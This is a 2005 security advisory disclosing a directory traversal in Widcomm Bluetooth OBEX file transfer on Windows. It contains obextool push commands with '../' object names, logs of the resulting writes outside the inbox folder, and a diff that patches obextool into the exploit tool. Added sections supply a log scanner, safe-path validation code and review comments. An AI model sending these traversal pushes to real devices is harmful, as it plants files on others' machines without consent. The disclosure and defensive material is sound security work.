'Widcomm BTW (Microsoft Windows BT stack) Directory Transversal'

Typos included at no charge.  =]
DMA[2005-0412a] - 'Widcomm BTW (Microsoft Windows BT stack) Directory Transversal'
Author: Kevin Finisterre
Vendor: http://66.45.42.84/Products, http://www.broadcom.com/press/release.php?id=525262
Product: 'versions older than BTW 3.0.1.905 ?'
References: http://www.digitalmunition.com/DMA[2005-0412a].txt

Description:
On August 11 2004, in Advisory Reference ptl-2004-03, Pentest Limited released very minimal detail on security issues related to 'WIDCOMM Bluetooth Connectivity Software'. CAN-2004-0775 (http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0775) was created in order to provide information surrounding this issue. Unfortunately none of the links provided by the CVE entry contain any real data on the attacks. In an effort to document and exploit the above mentioned issues I stumbled upon yet another problem.

WIDCOMM Inc., which is short for Wireless Internet and Data/Voice Communications, previously designed products for indoor wireless communications. Founded in June 1998, the company was focused on Bluetooth networking. WIDCOMM's goal was to make it secure, easy, and inexpensive for people with PCs, cellular phones, PDAs and laptops to wirelessly link their devices and to access the Internet.

On May 10 2004 Broadcom Corporation, a leading provider of highly integrated semiconductor solutions enabling broadband communications, announced that it had completed the acquisition of WIDCOMM.

I happen to own Bluetooth dongles from Belkin, Actiontec, Linksys, Ambicom, D-Link and Zoom, and only one of them came with BlueSoleil instead of Widcomm based software. I would guess that somewhere around 90% of the PC Bluetooth hardware on the market currently comes with Widcomm install media.

The dongle that I used for testing was an Ambicom BT2000C-US on Windows XP SP2. The software that was bundled with the dongle was a variant of Widcomm's Bluetooth Software version 1.4.2. Several other revisions are available; however, due to problems with licensing you may find it difficult to make use of anything that did not specifically come packaged with your device. I even ran into an instance in which my purchased dongle did not even work with the software it was bundled with (Thanks D-Link!).

Several sites document the difficulties that the end user is faced with when trying to use the various versions of the Widcomm software. Short of stating that Widcomm and Broadcom have really done a huge disservice to their end users, I will not go into the fiasco surrounding license.dat issues. Fixing and/or patching the vulnerabilities I am going to mention may be compounded by the fact that Widcomm and Broadcom's customer base is simply unable to upgrade. Widcomm has in essence shot us all in the foot.

After an install of the Widcomm software you are presented with the 'Initial Bluetooth Configuration' screen. Here you choose the name of your device and select the Bluetooth services it will provide. By default 'PIM Item Transfer' is set to start automatically with no authentication required. Under normal circumstances files are dropped into "<My Documents>\Bluetooth Exchange Folder". Any device that attempts to transfer files to or from your device should be limited to accessing this folder.

Unfortunately this is NOT the case; a simple ../ is enough to cause a little trouble. This attack can have its limitations depending on how the software settings are configured. Using a modified obextool binary from ussp-push we can easily demonstrate the problem.

As stated above, a normal transaction should limit files to the "<My Documents>\Bluetooth Exchange Folder".

animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE testfile 3
Sending object ...

BtserverSpylite output: 
00:32:17.995 OPP:  Settings for saving objects...
00:32:18.015       vCard's: 'Save to PIM'
00:32:18.035       vCal's:  'Do not accept'
00:32:18.055       vMsg's:  'Do not accept'
00:32:18.075       vNote's: 'Do not accept'
00:32:18.095       Other:   'Save to Inbox folder'
00:32:18.115       Folder:  'C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder\'
00:32:18.135 OPP:  File did not contain an object.  Save to Inbox as 'other' type.
00:32:18.155 OPP:  'testfile' saved to PIM Item Transfer Folder '...My Documents\Bluetooth Exchange Folder'


C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder>dir
 Volume in drive C has no label.
 Volume Serial Number is F888-ED9A

 Directory of C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder

07/12/2005  12:32 AM    <DIR>          .
07/12/2005  12:32 AM    <DIR>          ..
07/12/2005  12:32 AM               262 testfile
               1 File(s)            262 bytes
               2 Dir(s)  35,701,919,744 bytes free

We are however able to travel beyond the Bluetooth Exchange Folder by adding "../" to our request. Under the default configuration this allows us to write to the root of the My Documents folder.

animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE ../Im_rick_james 3
Sending object ...

00:35:19.897 OPP:  '../Im_rick_james' saved to PIM Item Transfer Folder '...\My Documents\Bluetooth Exchange Folder'

C:\Documents and Settings\Administrator\My Documents>dir
 Volume in drive C has no label.
 Volume Serial Number is F888-ED9A

 Directory of C:\Documents and Settings\Administrator\My Documents

07/12/2005  12:35 AM    <DIR>          .
07/12/2005  12:35 AM    <DIR>          ..
07/12/2005  12:35 AM               262 Im_rick_james
07/01/2005  08:38 PM    <DIR>          Bluetooth
07/12/2005  12:32 AM    <DIR>          Bluetooth Exchange Folder
07/01/2005  04:38 PM    <DIR>          My Music
06/25/2005  02:55 PM    <DIR>          My Pictures
06/27/2005  12:08 AM    <DIR>          My Virtual Machines
               1 File(s)            262 bytes
               7 Dir(s)  35,701,919,744 bytes free

For an unknown reason, when using the default configuration you are only able to go up one directory. Because of this you are limited to being able to write to the My Documents folder ONLY. This could be an XP SP2 thing. I have NOT tested this on Windows 9x based software at all. In other words your results may vary.

animosity:~/ussp-push-0.2# ./obextool push /etc/hosts 00:0C:41:E2:7A:EE ../../beiotch 3
Sending object ...
00:37:25.457 OPP:  Error - Could not rename 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\../../beiotch' to 'C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder\../../beiotch'

If you change the default drop directory from "<My Documents>\Bluetooth Exchange Folder" to something else, we are able to traverse a good portion of the file system. In this example we used C:\test\test2\test3\test4 as our Bluetooth drop folder.

00:57:38.471 OPP:  Settings for saving objects...
00:57:38.481       vCard's: 'Save to PIM'
00:57:38.501       vCal's:  'Do not accept'
00:57:38.511       vMsg's:  'Do not accept'
00:57:38.532       vNote's: 'Do not accept'
00:57:38.542       Other:   'Save to Inbox folder'
00:57:38.562       Folder:  'C:\test\test2\test3\test4'
00:57:38.582 OPP:  File did not contain an object.  Save to Inbox as 'other' type.
00:57:38.602 OPP:  '../blah' saved to PIM Item Transfer Folder 'C:\test\test2\test3\test4'

00:57:38.672 GKI freeq 0 (2:4) 1 (0:1) 2 (0:0) 3 (1:12) 4 (0:46)
00:57:57.599 OPP:  Settings for saving objects...
00:57:57.609       vCard's: 'Save to PIM'
00:57:57.629       vCal's:  'Do not accept'
00:57:57.649       vMsg's:  'Do not accept'
00:57:57.669       vNote's: 'Do not accept'
00:57:57.679       Other:   'Save to Inbox folder'
00:57:57.699       Folder:  'C:\test\test2\test3\test4'
00:57:57.719 OPP:  File did not contain an object.  Save to Inbox as 'other' type.
00:57:57.739 OPP:  '../../blah' saved to PIM Item Transfer Folder 'C:\test\test2\test3\test4'

00:58:14.243 OPP:  Settings for saving objects...
00:58:14.263       vCard's: 'Save to PIM'
00:58:14.283       vCal's:  'Do not accept'
00:58:14.293       vMsg's:  'Do not accept'
00:58:14.313       vNote's: 'Do not accept'
00:58:14.333       Other:   'Save to Inbox folder'
00:58:14.343       Folder:  'C:\test\test2\test3\test4'
00:58:14.363 OPP:  File did not contain an object.  Save to Inbox as 'other' type.
00:58:14.383 OPP:  '../../../blah' saved to PIM Item Transfer Folder 'C:\test\test2\test3\test4'

Again for some reason we run into a minor limitation on where the files can be dropped.

00:58:29.735 OPP:  Settings for saving objects...
00:58:29.755       vCard's: 'Save to PIM'
00:58:29.775       vCal's:  'Do not accept'
00:58:29.795       vMsg's:  'Do not accept'
00:58:29.815       vNote's: 'Do not accept'
00:58:29.835       Other:   'Save to Inbox folder'
00:58:29.855       Folder:  'C:\test\test2\test3\test4'
00:58:29.875 OPP:  File did not contain an object.  Save to Inbox as 'other' type.
00:58:29.895 OPP:  Error - Could not rename 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\../../../../blah' to 'C:\test\test2\test3\test4\../../../../blah'

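The BtserverSpylite excerpts above are the receiving side's own record of what was saved where, which makes them a usable detection source. The following is an added example, not part of the advisory or of the Widcomm software: a small Python scanner that reads lines in the two shapes shown above (the "saved to PIM Item Transfer Folder" line and the "Could not rename" error) and flags any object name that carries a path separator or a ".." component. The sample log is constructed from the advisory's own excerpts with the mail-wrapped lines rejoined; the two regular expressions are assumptions fitted to that format, not a documented log grammar.

```python
import re

# Two BtserverSpylite line shapes taken from the advisory's excerpts (assumed format):
#   HH:MM:SS.mmm OPP:  '<name>' saved to PIM Item Transfer Folder '<folder>'
#   HH:MM:SS.mmm OPP:  Error - Could not rename '<src>' to '<dst>'
SAVED_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d{3}) OPP:\s+'(?P<name>[^']*)' saved to "
    r"PIM Item Transfer Folder '(?P<folder>[^']*)'"
)
RENAME_ERR_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d{3}) OPP:\s+Error - Could not rename "
    r"'(?P<src>[^']*)' to '(?P<dst>[^']*)'"
)

# Constructed sample: the advisory's own log lines, with mail-wrapped lines rejoined.
SAMPLE_LOG = r"""
00:32:18.155 OPP:  'testfile' saved to PIM Item Transfer Folder '...My Documents\Bluetooth Exchange Folder'
00:35:19.897 OPP:  '../Im_rick_james' saved to PIM Item Transfer Folder '...\My Documents\Bluetooth Exchange Folder'
00:37:25.457 OPP:  Error - Could not rename 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\../../beiotch' to 'C:\Documents and Settings\Administrator\My Documents\Bluetooth Exchange Folder\../../beiotch'
00:57:38.471 OPP:  Settings for saving objects...
00:58:14.383 OPP:  '../../../blah' saved to PIM Item Transfer Folder 'C:\test\test2\test3\test4'
00:58:29.895 OPP:  Error - Could not rename 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\../../../../blah' to 'C:\test\test2\test3\test4\../../../../blah'
""".strip().splitlines()


def _components(path):
    """Split on both separators, since Windows accepts '/' as well as the backslash."""
    return re.split(r"[\\/]", path)


def has_dotdot(path):
    """True if any path component is '..'."""
    return any(part == ".." for part in _components(path))


def is_traversal_name(name):
    """An OPP object name should be a single file name; any separator or '..' is hostile."""
    return len(_components(name)) > 1 or has_dotdot(name)


def scan_opp_log(lines):
    """Return (timestamp, verdict, name) for each line showing a name that left the inbox."""
    findings = []
    for line in lines:
        m = SAVED_RE.match(line)
        if m:
            if is_traversal_name(m["name"]):
                # The stack reports the save as successful: the file landed outside the inbox.
                findings.append((m["ts"], "saved-outside-inbox", m["name"]))
            continue
        m = RENAME_ERR_RE.match(line)
        if m and has_dotdot(m["dst"]):
            # The rename failed, so nothing was written, but the attempt itself is the signal.
            findings.append((m["ts"], "traversal-attempt-failed", m["dst"]))
    return findings


if __name__ == "__main__":
    for ts, verdict, name in scan_opp_log(SAMPLE_LOG):
        print(f"{ts}  {verdict:26}  {name}")
```

The two verdicts are kept distinct on purpose: a "saved" line with a traversal name means a file already exists outside the drop folder and should be located and removed, while the rename error means the OS blocked the write and only the attempt needs recording.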
As you can see, the Bluetooth drop directory can easily be ignored by the attacker.

C:\>dir test\blah test\test2\blah test\test2\test3\blah 

 Volume in drive C has no label.
 Volume Serial Number is F888-ED9A

 Directory of C:\test

07/12/2005  12:58 AM               262 blah
               1 File(s)            262 bytes

 Directory of C:\test\test2

07/12/2005  12:57 AM               262 blah
               1 File(s)            262 bytes

 Directory of C:\test\test2\test3

07/12/2005  12:57 AM               262 blah
               1 File(s)            262 bytes


I have not seen this issue documented anywhere. It was not described in the release by pentest.co.uk, nor was it mentioned in any advisory from Widcomm or Broadcom. I am unable to tell exactly when this issue was introduced into the Widcomm codebase and I am equally unable to tell exactly when it was fixed. All of the above testing was performed against PC versions of the software; it is currently unknown how other Widcomm platforms are affected by this issue.

I have confirmed that versions 4.0.1.700 and 3.0.1.905 are NOT exploitable (for this condition). In these versions the "../" request is replaced with "..x", thus preventing the attack.
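The fix observed in 3.0.1.905 and 4.0.1.700 is a string rewrite of "../" to "..x". As an added example (not vendor code and not part of the advisory), the following Python shows what a receiving OPP server's name handling looks like when it is done by containment instead: accept exactly one plain file-name component, then resolve the candidate path and confirm it is still under the inbox folder. vendor_style_rewrite() is only a reconstruction of the behaviour the advisory describes, kept alongside for comparison; the inbox path and the sample names are constructed.

```python
import os
import re

_SEP_RE = re.compile(r"[\\/]")  # Windows accepts both separators, so treat both as such


class UnsafeObjectName(ValueError):
    """Raised when a client-supplied OBEX object name must not be used as a file name."""


def vendor_style_rewrite(object_name):
    # Reconstruction of the behaviour the advisory reports for BTW 3.0.1.905 / 4.0.1.700:
    # every "../" in the received name becomes "..x" (illustration only, not vendor code).
    return object_name.replace("../", "..x")


def safe_inbox_path(inbox_dir, object_name):
    """Map a client-supplied object name onto a file inside inbox_dir.

    Rather than rewriting suspicious substrings, this allows only a single plain
    file-name component and then verifies that the resolved path is still inside the
    inbox. Returns the absolute path to write to, or raises UnsafeObjectName.
    """
    # 1. Syntactic check: one component, no dot-dirs, no drive letter or stream prefix.
    if (not object_name
            or _SEP_RE.search(object_name)
            or object_name in (".", "..")
            or ":" in object_name):
        raise UnsafeObjectName(object_name)
    # 2. Semantic check: resolve and confirm containment. This is the defence that does
    #    not depend on having enumerated every spelling of a separator.
    base = os.path.realpath(inbox_dir)
    candidate = os.path.realpath(os.path.join(base, object_name))
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafeObjectName(object_name)
    return candidate


def is_accepted(inbox_dir, object_name):
    """Boolean wrapper around safe_inbox_path for checks and logging."""
    try:
        safe_inbox_path(inbox_dir, object_name)
        return True
    except UnsafeObjectName:
        return False


if __name__ == "__main__":
    # Constructed inbox standing in for "<My Documents>\Bluetooth Exchange Folder".
    inbox = os.path.join(os.getcwd(), "Bluetooth Exchange Folder")
    for name in ("testfile", "../Im_rick_james", "../../beiotch", "..\\up.txt", "C:notes.txt"):
        verdict = "accept" if is_accepted(inbox, name) else "REJECT"
        print(f"{name!r:22} -> {verdict}   (rewrite would give {vendor_style_rewrite(name)!r})")
```

The syntactic check alone would already reject everything the advisory sends, but the containment check is the one to keep: it gives the same answer whether the name arrived with forward slashes, backslashes, or some encoding the first check did not anticipate, and it is cheap enough to run on every received object.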

Timeline associated with this bug:
04/12/2005 Public disclosure, due to the fact that the bug was silently fixed by the vendor(s) in the past.

Regurgitated Workaround:
'...(we) recommend that end users stop using the vulnerable WIDCOMM Bluetooth software'. Alternatively users can 'set their Bluetooth device configuration to be non-discoverable or hidden'. Please note however: 'This will not stop the device from being vulnerable but it may limit the exposure.'

Due to the fact that this issue was patched silently, NO attempt was made to notify Broadcom or Widcomm about this issue. The issue appears to have been patched in version 3.x. Unfortunately, due to licensing issues, users of this software will find it difficult to patch this vulnerability, and I found it difficult to research which versions were and were not vulnerable. Bug your vendor to get you some updated software and ask them to quit playing games over license.dat files!

Other vendors are affected by similar issues and future advisories will be released.

All your Bluetooth are belong to greenplaque. 

-KF


@@ -305,20 +305,21 @@

 void cmd_push(bdaddr_t *local, int argc, char **argv)
 {
-       char *filename;
+       char *filename, *malfile;
        char *alias;
        bdaddr_t bdaddr;
        uint8_t channel;
-
+
        if (argc < 3) {
                usage();
                return;
        }

        filename = argv[1];
-       alias = basename(filename);
        str2ba(argv[2], &bdaddr);
-       channel = (argc > 3) ? atoi(argv[3]) : 10;
+       malfile = argv[3];
+       alias = malfile;
+       channel = (argc > 4) ? atoi(argv[4]) : 3;

        btobex_push(&bdaddr, channel, filename, alias);
 }
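Review bot: the argument-count guard no longer matches what the function reads. `malfile = argv[3];` is now dereferenced unconditionally, but the check above it is still `if (argc < 3)`, so running the tool with only `<file>` and `<bdaddr>` passes argv[3] (the NULL terminator of argv) on as `alias` and into btobex_push(); the guard should become `if (argc < 4)`, which also matches the usage string that now lists `<malfile>` as required. Dropping `alias = basename(filename);` is the whole point of the change and deserves a comment: basename() was the only thing stripping directory components from the object name sent to the receiver (the OBEX Name header), and it ran on the sender's side, so it never protected the receiving end; the advisory's lesson is that the OPP server must normalize that name itself. The default channel also moves silently from 10 to 3; state that in the commit message or leave it as it was.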
@@ -330,7 +331,7 @@
        char *opt;
        char *doc;
 } command[] = {
-       { "push", cmd_push, "<file> <bdaddr> [channel]", "Push a file" },
+       { "push", cmd_push, "<file> <bdaddr> <malfile> [channel] ", "Push a 
file" },
        { NULL, NULL, 0, 0 }
 };
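Review bot: stray trailing space inside the option string `"<file> <bdaddr> <malfile> [channel] "`; drop it so the usage output lines up with the other entries. As pasted here the `{ "push", ... }` line is also broken across two lines by the mailer (`"Push a` / `file" },`), so the hunk will not apply with patch(1) until that line is rejoined.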